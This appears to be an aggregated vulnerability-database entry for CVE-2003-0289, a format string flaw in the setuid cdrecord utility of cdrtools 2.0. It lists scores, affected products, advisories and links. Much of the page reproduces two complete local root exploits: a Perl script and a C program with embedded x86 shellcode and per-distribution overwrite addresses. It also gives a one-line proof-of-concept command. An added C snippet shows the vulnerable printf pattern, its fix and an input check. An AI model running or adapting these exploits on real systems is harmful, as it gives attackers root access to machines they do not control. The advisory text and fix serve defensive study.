CVE-2003-0289
CVSS7.2
Published: 2003-06-16 00:00:00
Revised: 2016-10-17 22:31:51

[Original] Format string vulnerability in scsiopen.c of the cdrecord program in cdrtools 2.0 allows local users to gain privileges via format string specifiers in the dev parameter.


[CNNVD] CDRTools CDRecord Devname Format String Vulnerability (CNNVD-200306-084)

A format string vulnerability exists in scsiopen.c of the cdrecord program in cdrtools 2.0. Local users can gain elevated privileges via format string specifiers in the dev parameter.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:cdrtools:cdrecord:2.0
cpe:/a:cdrtools:cdrecord:1.11

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0289
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0289
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-084
(official data source) CNNVD

- Other links and resources

ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz
(UNKNOWN)  CONFIRM  ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz
http://forums.gentoo.org/viewtopic.php?t=54904
(UNKNOWN)  GENTOO  200305-06
http://marc.info/?l=bugtraq&m=105285564307225&w=2
(UNKNOWN)  BUGTRAQ  20030513 cdrtools2.0 Format String Vulnerability
http://marc.info/?l=bugtraq&m=105286031812533&w=2
(UNKNOWN)  BUGTRAQ  20030513 Cdrecord_local_root_exploit.
http://www.mandriva.com/security/advisories?name=MDKSA-2003:058
(UNKNOWN)  MANDRAKE  MDKSA-2003:058
http://www.securiteam.com/exploits/5ZP0C2AAAC.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5ZP0C2AAAC.html
http://www.securityfocus.com/bid/7565
(VENDOR_ADVISORY)  BID  7565
http://xforce.iss.net/xforce/xfdb/12007
(UNKNOWN)  XF  cdrtools-scsiopen-format-string(12007)

- Vulnerability information

CDRTools CDRecord Devname Format String Vulnerability
High Format string
2003-06-16 00:00:00 2005-10-20 00:00:00
Local
A format string vulnerability exists in scsiopen.c of the cdrecord program in cdrtools 2.0. Local users can gain elevated privileges via format string specifiers in the dev parameter.

- Advisories and patches

Mandrake has released a security advisory (MDKSA-2003:058-1), updating a previous advisory. Users are advised to upgrade as soon as possible. Further information regarding how to obtain and apply fixes can be found in the attached advisory.
The vendor has released an update to address this issue:
CDRTools CDRecord 2.0
        

- Vulnerability information (31)

CdRecord Version <= 2.0 Mandrake local root exploit (EDBID:31)
linux local
2003-05-14 Verified
0 n/a
N/A
#!/usr/bin/perl
###########################################################
# Cdrecord version 2.0 and < local root exploit.
#
#
#   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
#   Using target number 4
#   Using Mr .dtors 0x808c82c
#   Cdrecord 2.0 (i586-mandrake-linux-gnu)
#
#   scsibus: -1 target: -1 lun: -1
#   Warning: Open by 'devname' is unintentional and not supported.
#   /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
#   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
#   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
#   sh-2.05b# id
#   uid=0(root) gid=0(root) groups=503(wsxz)
#   sh-2.05b#
#####################################################

$shellcode =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80". # setuid 0
    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80". # setgid 0
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
    "\xff\xff/bin/sh";

$cdrecordpath = "/usr/bin/cdrecord";
$nop = "\x90"; # x86 NOP
$offset = 0;   # Default offset to try.

if (@ARGV == 1 || @ARGV == 2) {
    $target = $ARGV[0];
    $offset = $ARGV[1];
} else {
    printf(" Priv8security.com Cdrecord local root exploit!!\n");
    printf(" usage: $0 target\n");
    printf(" List of targets:\n");
    printf("      1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
    printf("      2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
    printf("      3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
    printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
    exit(1);
}

if ( $target eq "1" ) {
    $retword = 0x0807af38; # Mr .dtors ;)
    $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
}
if ( $target eq "2" ) {
    # $retword = 0x08084578; # .dtors
    $retword = 0x08084684; # .GOT exit
    $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
}
if ( $target eq "3" ) {
    $retword = 0x0807f658;
    $fmtstring = "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
}
if ( $target eq "4" ) {
    $retword = 0x0808c82c; # .GOT exit
    $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
}

printf("Using target number %d\n", $target);
printf("Using Mr .dtors 0x%x\n", $retword);

$new_retword = pack('l', ($retword));
$new_retshell = pack('l', ($retshell));
$buffer2 = $new_retword;
$buffer2 .= $nop x 150;
$buffer2 .= $shellcode;
$buffer2 .= $fmtstring;

exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");


# milw0rm.com [2003-05-14]
		

- Vulnerability information (22594)

CDRTools CDRecord 1.11/2.0 Devname Format String Vulnerability (EDBID:22594)
linux local
2003-05-13 Verified
0 CMN
N/A
source: http://www.securityfocus.com/bid/7565/info

CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function.

It has been reported that by harnessing an unsupported feature of the CDRecord utility, an attacker may supply format string specifiers as the 'dev' argument passed to the vulnerable utility.

This may ultimately result in the execution of attacker-supplied code in the context of the CDRecord utility. It has been reported that CDRecord is installed setUID root on several distributions.

It should be noted that although this vulnerability has been reported to affect CDRecord version 2.0, previous versions might also be affected.

/*
 * cdrecord, readcd, cdda2wav (cdrtools 2.0) exploit by CMN
 *
 * <cmn@darklab.org>/<md0claes@mdstud.chalmers.se>
 */

#include <sys/types.h>  /* u_char, u_int, u_long */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#define NOP             0x90
#define BUFSIZE         65536
#define FMTSTRSIZE      512
#define DUMMY           0x204e4d43

static const char linuxcode[] =
    "\xb9\xff\xff\xff\xff" /* movl    $-1, %ecx   */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x31"             /* movb    $0x31, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x46"             /* movb    $0x46, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x32"             /* movb    $0x32, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x47"             /* movb    $0x47, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xd2"             /* xorl    %edx, %edx  */
    "\x52"                 /* pushl   %edx        */
    "\x68\x2f\x2f\x73\x68" /* pushl   $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl   $0x6e69622f */
    "\x89\xe3"             /* movl    %esp, %ebx  */
    "\x52"                 /* pushl   %edx        */
    "\x53"                 /* pushl   %ebx        */
    "\x89\xe1"             /* movl    %esp, %ecx  */
    "\xb0\x0b"             /* movb    $0xb, %al   */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\x40"                 /* inc     %eax        */
    "\xcd\x80";            /* int     $0x80       */

struct vulnfo {
    char *bin;        /* char *, not u_char *: initialised from string literals and passed to execve() */
    u_int retloc;
    char *stackpop;
    u_int fmt_written;
    u_int pop_written;
    char *arg2;
};

static struct vulnfo targets[] =
{
                       /* .dtors */
    {"/usr/bin/cdrecord", 0x0808bf04+4, "%.f%.f%.f%08x%08x%.f%.f%.f%08x", 13, 36, "/bin/sh"},
    {"/usr/bin/readcd", 0x080683a4+4, "%.f%.f%.f%08x%08x%.f%.f%.f%08x", 13, 37, NULL},
    {"/usr/bin/cdda2wav", 0x08082244+4, "%.f%.f%.f%08x%08x%.f%.f%.f%08x", 13, 37, NULL},
};

void
usage(char *pname)
{
    printf("Usage: %s <target> [-l<retloc>] [-r<retaddr>] [-o<offset>]\n", pname);
    printf("Targets: \n");
    printf("       0 - '%s' (Slackware 8.1, cdrtools-2.01a5-i686-1.tgz)\n", targets[0].bin);
    printf("       1 - '%s' (Slackware 8.1, cdrtools-2.01a5-i686-1.tgz)\n", targets[1].bin);
    printf("       2 - '%s' (Slackware 8.1, cdrtools-2.01a5-i686-1.tgz)\n\n", targets[2].bin);
}

int
main(int argc, char *argv[])
{
    u_long ret = (u_long)&ret;
    struct vulnfo *target;
    char buf[FMTSTRSIZE];
    char envbuf[BUFSIZE];
    long offset = 0;
    u_int written;
    char *pt;
    char *av[4];
    char *ev[2];
    int i;
    int tmp;
    int wb;
    int pad;

    printf("\n** cdrecord, readcd, cdda2wav (cdrtools 2.0) exploit by CMN **\n");

    if (argc < 2) {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    i = atoi(argv[1]);

    if ((i>=0) && (i<=2)) {
        target = &targets[i];
    }
    else {
        fprintf(stderr, "Unknown target!\n");
        exit(EXIT_FAILURE);
    }

    argc--;
    argv++;

    while ( (i = getopt(argc, argv, "l:r:o:")) != -1) {
        switch(i) {

            case 'l':
                target->retloc = strtoul(optarg, NULL, 0);
                break;

            case 'r':
                ret = strtoul(optarg, NULL, 0);
                break;

            case 'o':
                offset = strtol(optarg, NULL, 0);
                break;

            default:
                usage(argv[0]);
                exit(EXIT_FAILURE);
                break;
        }
    }

    ret -= offset;
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
    printf("Target program: '%s'\n", target->bin);
    printf("Using address 0x%08x, retloc 0x%08x\n", (u_int)ret, target->retloc);
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n");
    written = target->fmt_written;

    snprintf(buf, 5, "dev=");
    pt = &buf[4];

    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc;
    pt += 8;
    written += 8;


    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc+1;
    pt += 8;
    written += 8;

    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc+2;
    pt += 8;
    written += 8;

    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc+3;
    pt += 8;
    written += 8;

    memcpy(pt, target->stackpop, strlen(target->stackpop));
    pt += strlen(target->stackpop);
    written += target->pop_written;

    for (i=0; i<4; i++) {
        wb = ((u_char *)&ret)[i] + 0x100;
        written %= 0x100;
        pad = (wb - written) % 0x100;

        if (pad < 10)
            pad += 0x100;

        tmp = sprintf(pt, "%%%du%%n", pad);
        written += pad;
        pt += tmp;
    }

    memset(envbuf, NOP, sizeof(envbuf));
    memcpy(&envbuf[BUFSIZE - (sizeof(linuxcode)+24)],
        linuxcode, sizeof(linuxcode));

    av[0] = target->bin;
    av[1] = buf;
    av[2] = target->arg2;
    av[3] = (char *)NULL;

    ev[0] = envbuf;
    ev[1] = (char *)NULL;

    execve(target->bin, av, ev);
    perror("execve()");
    exit(EXIT_FAILURE);
}
		

- Vulnerability information

6794
cdrtools cdrecord scsiopen.c Overflow
Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-05-13 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

CDRTools CDRecord Devname Format String Vulnerability
Input Validation Error 7565
No Yes
2003-05-13 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Stefano Di Paola <st0r1e@libero.it>.

- Affected program versions

CDRTools CDRecord 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
CDRTools CDRecord 1.11
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2

- Vulnerability discussion

CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function.

It has been reported that by harnessing an unsupported feature of the CDRecord utility, an attacker may supply format string specifiers as the 'dev' argument passed to the vulnerable utility.

This may ultimately result in the execution of attacker-supplied code in the context of the CDRecord utility. It has been reported that CDRecord is installed setUID root on several distributions.

It should be noted that although this vulnerability has been reported to affect CDRecord version 2.0, previous versions might also be affected.

- Exploit

The following proof of concept was supplied; an additional exploit, 'priv8cdr.pl', was supplied by Priv8security.com:

$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c
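As an added example (it is not code from the original page, nor from the cdrtools project), the C snippet below shows the defect class that the proof of concept above triggers and the one-line fix for it: cdrecord let the user-controlled dev= string reach a printf-style error routine as its format argument, whereas the hardened form passes that string only as a %s argument. It also includes a small input check that an audit tool or wrapper can apply to a dev= value before it reaches any printf-family call. The function names and the error message text are assumptions for illustration, not cdrecord's own.

```c
/* Added illustration, not cdrtools code: the vulnerable pattern behind
 * CVE-2003-0289 next to its hardened form. Function names and message text
 * are hypothetical. */
#include <stdio.h>
#include <string.h>

/* VULNERABLE pattern: the caller's text becomes the format string.
 * It is exercised below only with the "%%" escape, whose behaviour is
 * defined, which is enough to show that the input is parsed as a format.
 * Any %x, %s or %n in real input would read or write memory instead. */
int format_device_error_unsafe(char *out, size_t outsz, const char *dev)
{
    return snprintf(out, outsz, dev);   /* BUG: dev used as the format */
}

/* HARDENED pattern: the format is a literal; user text only ever passes
 * through %s, so '%' characters in it are copied verbatim. */
int format_device_error_safe(char *out, size_t outsz, const char *dev)
{
    return snprintf(out, outsz, "Cannot open '%s'. Cannot open SCSI driver.", dev);
}

/* Defensive check for a value such as the dev= argument: counts '%'
 * characters that would start a conversion directive. "%%" is the literal
 * percent escape and is not counted. A non-zero result means the string
 * must never be handed to a printf-family function as its format. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* skip the escaped "%%" pair */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char buf[256];
    /* Constructed sample inputs: a benign SCSI triple, the shape of the
     * proof-of-concept string from the advisory, and an escaped percent. */
    const char *benign  = "0,0,0";
    const char *probe   = "AAAA|%x%x%x";
    const char *escaped = "disk 100%%";

    format_device_error_safe(buf, sizeof buf, probe);
    printf("safe   : %s\n", buf);        /* the %x sequences survive verbatim */

    format_device_error_unsafe(buf, sizeof buf, escaped);
    printf("unsafe : %s\n", buf);        /* "%%" collapsed to "%": parsed as a format */

    printf("directives in \"%s\": %d\n", probe,  count_format_directives(probe));
    printf("directives in \"%s\": %d\n", benign, count_format_directives(benign));
    return 0;
}
```

The check is deliberately strict: the setuid context makes any directive in the string unacceptable, so a wrapper should reject (not sanitise) a dev= value for which count_format_directives() is non-zero, and the real fix remains the literal-format call shown in format_device_error_safe().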

- Solution

Mandrake has released a security advisory (MDKSA-2003:058-1), updating a previous advisory. Users are advised to upgrade as soon as possible. Further information regarding how to obtain and apply fixes can be found in the attached advisory.

The vendor has released an update to address this issue:


CDRTools CDRecord 2.0

- References
